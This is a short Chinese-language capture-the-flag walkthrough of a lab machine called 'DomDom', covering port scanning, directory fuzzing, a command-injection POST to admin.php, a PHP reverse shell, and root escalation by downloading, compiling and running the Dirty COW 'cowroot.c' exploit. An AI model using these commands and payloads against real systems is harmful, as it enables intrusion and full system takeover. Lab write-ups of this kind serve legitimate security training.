主机层面扫描:
╰─ nmap -p1-65535 -A -sV 10.10.202.140
You name 存在XSS 漏洞
右键源码有隐藏form表单
修改其type属性为:text
尝试了SQL注入貌似无注入
wfuzz 下目录试试
+ http://10.10.202.140/admin.php (CODE:200|SIZE:329)
+ http://10.10.202.140/index.php (CODE:200|SIZE:694)
+ http://10.10.202.140/server-status (CODE:403|SIZE:301)
http://10.10.202.140/admin.php
Welcome to DomDom !
You need to know it's your actions that will show you the light.
我们尝试POST数据到admin.php接口
看到这个界面,试试能不能执行系统命令
不知道没执行还是没回显到前台来,我们尝试把参数加到boday中去
POST /admin.php HTTP/1.1
Host: 10.10.202.140
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
name=admin&username=admin&password=admin&access=access&cmd=id
看来RCE是可以执行的,我们尝试下载远程php-resver.php 试试
http://10.10.202.140/php-reverse.php
进行提权操作:
$ wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
$ gcc cowroot.c -o cowroot -pthread
$ ./cowroot
完结!